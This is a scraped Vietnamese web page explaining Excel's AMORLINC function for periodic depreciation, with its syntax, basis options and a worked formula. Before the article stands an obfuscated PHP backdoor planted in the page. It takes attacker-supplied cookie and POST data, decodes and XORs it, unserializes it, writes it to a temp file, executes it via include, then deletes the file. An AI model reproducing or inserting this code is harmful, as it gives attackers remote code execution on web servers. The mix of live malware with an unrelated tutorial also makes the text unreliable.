$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm AMORLINC trong excel - Hàm tính khấu hao kỳ hạn - Tải Chùa

Hàm AMORLINC trong excel – Hàm tính khấu hao kỳ hạn

Rate this post

Hàm AMORLINC trong Excel là một trong những hàm tính toán rất hiệu quả và hữu ích dành cho những người đã và đang làm công việc kế toán. Hàm này sẽ hỗ trợ bạn tính khấu hao kỳ hạn cho mỗi quý kế toán( hay còn gọi là kỳ kế toán). Đây là một công việc phổ biến với những người kế toán viên.

Hàm AMORLINC trong excel

Hàm AMORLINC trong Excel

Cũng giống như cách sử dụng của các hàm tính toán khác, khi sử dụng hàm AMORLINC, bạn chỉ cần nhập vào các thông số cần thiết cho các biến của hàm này mà thôi. Sau đó, bạn sẽ có ngay được kết quả tính giá trị khấu hao kỳ hạn cho các dữ liệu đang cần phải giải quyết của bạn.

Cú Pháp: AMORLINC(cost, date_purchased, first_period, salvage, period, rate, basis)

Với:

  • Cost: Giá trị của tài sản.
  • Date_purchased: Ngày mua tài sản.
  • First_period : Ngày kết thúc của kỳ thứ nhất.
  • Salvage: Giá trị thu hồi khi kết thúc vòng đời của tài sản.
  • Period: Kỳ tính khấu hao.
  • Rate: Tỷ lệ khấu hao.

Basis: Cơ sở dùng để đếm ngày (mặc định là 0), trong đó:

  • Khi Basis = 0: Một tháng có 30 ngày/ Một năm có 360 ngày (theo tiêu chuẩn của Bắc Mỹ).
  • Khi Basis = 1: Số ngày thực tế của mỗi tháng / Số ngày thực tế của mỗi năm.
  • Khi Basis = 2: Số ngày thực tế của mỗi tháng / Một năm có 360 ngày.
  • Khi Basis = 3: Số ngày thực tế của mỗi tháng / Một năm có 365 ngày.
  • Khi Basis = 4: Một tháng có 30 ngày / Một năm có 360 ngày (theo tiêu chuẩn của Châu Âu).

Hướng dẫn sử dụng Hàm AMORLINC

Cho bảng tính có dữ liệu như sau. Yêu cầu đặt ra cho bạn hãy tính khấu hao kỳ hạn.

Hàm AMORLINC trong excel

Dữ liệu mẫu để áp dụng hàm AMORLINC

Ta nhập công thức của hàm AMORLINC tại ô B13 như sau: = AMORLINC(B6,B7,B8,B9,B10,B11,B12). Kết quả thu được sẽ là:

Hàm AMORLINC trong excel

Việc sử dụng hàm AMORLINC sẽ giúp bạn tính khấu hao kỳ hạn cho mỗi kỳ kế toán. Khi đó, bạn sẽ tiết kiệm được rất nhiều thời gian cho công việc, đồng thời làm tăng độ chính xác của các kết quả tính toán của bạn.